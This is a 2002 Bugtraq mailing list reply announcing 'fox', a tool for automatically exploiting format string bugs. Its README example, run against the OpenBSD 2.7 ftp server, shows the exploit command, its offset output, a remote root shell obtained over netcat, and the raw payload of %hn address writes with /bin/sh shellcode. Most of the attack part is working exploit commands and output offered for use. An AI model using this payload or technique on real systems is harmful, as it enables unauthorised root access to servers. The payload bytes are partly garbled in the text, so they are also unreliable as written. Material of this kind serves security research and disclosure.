Bugtraq mailing list archives
Re: Howto exploit a remote format bug automatically
From: Fredrik Widlund <fredrik.widlund () defcom com>
Date: Fri, 19 Apr 2002 12:57:52 +0100
Hi "fox", a tool I wrote for automatically exploiting any (or most) format bugs, locally and remotely. Runs on OpenBSD and not ported to other platforms, though it should be very straighforward. The only requirement is that you get the actual printed string back to the program, in the case of the OpenBSD 2.7 ftpd you need to proxy this through a small shell program since the output occurs in the process listing. Should work for exploiting bugs on most little-endian 32bit-machines like the i386 providing you supply the shellcode. Includes a trivial local example, and an example of how to point it at the OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner. Regards, Fredrik Widlund -x- README for example 2: Exploiting OpenBSD 2.7 ftp server Input has to be < 256 characters, working offsets are -18 and -2 Ex: root@wolf> ./fox -s 220 -p 50 -o-18 ex2/ex2 alignment 0 chars before argument 111 chars before insert 0 argument offset 9 argument pointer offset 0 argument address 0xdfbfd15c esp 0xdfbfd138 uid=0(root) gid=0(wheel) groups=0(wheel) root@wolf> nc 127.0.0.1 21 id uid=0(root) gid=0(wheel) groups=0(wheel) uname -a OpenBSD wolf 2.7 GENERIC#0 i386 cat /etc/hosts 127.0.0.1 AAAA<81>ð<81>Ð<81>¿<81>ßBBBB<81>ñ<81>Ð<81>¿<81>ßCCCC<81>ò<81>Ð<81>¿ <81>ßDDDD<81>ó<81>Ð<81>¿<81>ß%p%p%p%p%p%p%p%p%p%0323x%hn%0287x%hn%0238x%hn%0288x%hn<81>ëI<8B>$<81>Ã1<81>ÉQ<83><81>ÀP<89><81>Ã<83><81>ÃS<89>?<88>K<83><89>X<88>K <83><81>Ã<89><88>K<83><89>HP<81>¸;UUU%;<81>ª<81>ª<81>ª<81>Í<80>PP<81>¸UUU%<81>ª <81>ª<81>ª<81>Í<80><81>è<81>²<81>ÿ<81>ÿ<81>ÿ<81>ë<81>´[CODE_BY_LONEWOLF]/bin/shF-cGG/bin/shAxxxxxxxxxxxxx exit root@wolf>
Attachment:
fox0.1.tgz
Description: format bug exploiter
Current thread:
- Howto exploit a remote format bug automatically Frédéric Raynal (Apr 18)
- Re: Howto exploit a remote format bug automatically Fredrik Widlund (Apr 19)